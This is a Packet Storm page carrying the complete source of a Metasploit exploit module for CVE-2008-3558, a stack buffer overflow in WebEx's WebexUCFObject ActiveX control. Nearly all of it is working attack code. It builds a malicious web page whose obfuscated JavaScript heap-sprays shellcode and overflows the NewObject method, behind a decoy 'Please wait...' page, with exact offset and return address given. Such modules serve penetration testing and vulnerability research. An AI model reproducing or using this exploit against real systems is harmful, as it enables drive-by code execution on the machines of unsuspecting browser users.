This Metasploit module exploits a stack-based buffer overflow in WebEx's WebexUCFObject ActiveX Control. If an long string is passed to the 'NewObject' method, a stack- based buffer overflow will occur when copying attacker-supplied data using the sprintf function. It is noteworthy that this vulnerability was discovered and reported by multiple independent researchers.
f2d99a88beab4e4dd35711d91502b078##
# $Id: webex_ucf_newobject.rb 8712 2010-03-04 17:41:26Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'WebEx UCF atucfobj.dll ActiveX NewObject Method Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in WebEx's WebexUCFObject
ActiveX Control. If an long string is passed to the 'NewObject' method, a stack-
based buffer overflow will occur when copying attacker-supplied data using the
sprintf function.
It is noteworthy that this vulnerability was discovered and reported by multiple
independent researchers. To quote iDefense's advisory, "Before this issue was
publicly reported, at least three independent security researchers had knowledge
of this issue; thus, it is reasonable to believe that even more people were aware
of this issue before disclosure."
NOTE: Due to input restrictions, this exploit uses a heap-spray to get the payload
into memory unmodified.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Tobias Klein', # initial discoverer
'Elazar Broad', # initial discoverer
'Guido Landi', # milw0rm exploit
'jduck' # metasploit version
],
'Version' => '$Revision: 8712 $',
'References' =>
[
[ 'CVE', '2008-3558' ],
[ 'OSVDB', '47344' ],
[ 'BID', '30578' ],
[ 'URL', 'http://www.exploit-db.com/exploits/6220' ],
[ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=849' ],
[ 'URL', 'http://www.trapkit.de/advisories/TKADV2008-009.txt' ],
[ 'URL', 'http://tk-blog.blogspot.com/2008/09/vulnerability-rediscovery-xss-and-webex.html' ],
[ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2008-08/0084.html' ],
[ 'URL', 'http://www.cisco.com/en/US/products/products_security_advisory09186a00809e2006.shtml' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'InitialAutoRunScript' => 'migrate -f',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00",
'DisableNops' => true
},
'Platform' => 'win',
'Targets' =>
[
# Tested with atucfobj.dll v20.2008.2601.4928
[ 'Windows Universal', { 'Ret' => 0x0c0c0c0c } ],
],
'DefaultTarget' => 0))
end
def autofilter
false
end
def check_dependencies
use_zlib
end
def on_request_uri(cli, request)
# ActiveX parameters
progid = "WebexUCFObject.WebexUCFObject"
clsid = "32E26FD9-F435-4A20-A561-35D4B987CFDC"
# Set parameters
fnname = rand_text_alpha(8+rand(8))
offset = 232
# Build the exploit buffer
sploit = rand_text_alphanumeric(offset)
sploit << [target.ret - 0x20000].pack('V')
# Encode variables
sploit = Rex::Text.to_hex(sploit, '%')
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Prepare the heap spray parameters
spray_num = "0x%x" % target.ret
# Generate the final javascript
js = %Q|
function #{fnname}()
{
try {
var obj = new ActiveXObject("#{progid}");
var my_unescape = unescape;
var shellcode = '#{shellcode}';
#{js_heap_spray}
sprayHeap(my_unescape(shellcode), #{spray_num}, 0x40000);
var sploit = my_unescape("#{sploit}");
obj.NewObject(sploit);
} catch( e ) { window.location = 'about:blank' ; }
}
|
# Obfuscate the javascript
opts = {
'Strings' => true,
'Symbols' => {
'Variables' => %w{ obj my_unescape shellcode arg1 arg2 sploit }
}
}
js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)
js.obfuscate()
# Build the final HTML
content = %Q|<html>
<head>
<script language=javascript>
#{js}
</script>
</head>
<body onload="#{fnname}()">
Please wait...
</body>
</html>
|
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
send_response_html(cli, content)
handler(cli)
end
end
© 2012 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed
Comments
No comments yet, be the first!